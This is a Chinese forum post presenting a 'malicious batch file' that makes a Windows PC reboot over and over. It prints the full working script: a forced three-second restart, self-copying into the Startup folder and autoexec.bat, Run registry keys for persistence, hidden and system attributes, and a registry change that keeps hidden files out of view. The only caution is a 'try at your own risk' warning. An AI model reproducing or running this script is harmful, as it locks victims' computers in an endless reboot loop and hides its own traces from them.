随县联想电脑 发表于 2013-10-12 11:11:12

反复重启的恶意批处理.bat 【非请勿试,后果自负~】

反复重启就是让别人启动了再重启 一直反复,以下代码@echo off
shutdown -r -t 3
copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat
copy %0 c:\autoexec.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
attrib autoexec.bat +r +s +h
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f
del %0




3秒重启 加入了启动项 开机就会3秒倒计时

页: [1]
查看完整版本: 反复重启的恶意批处理.bat 【非请勿试,后果自负~】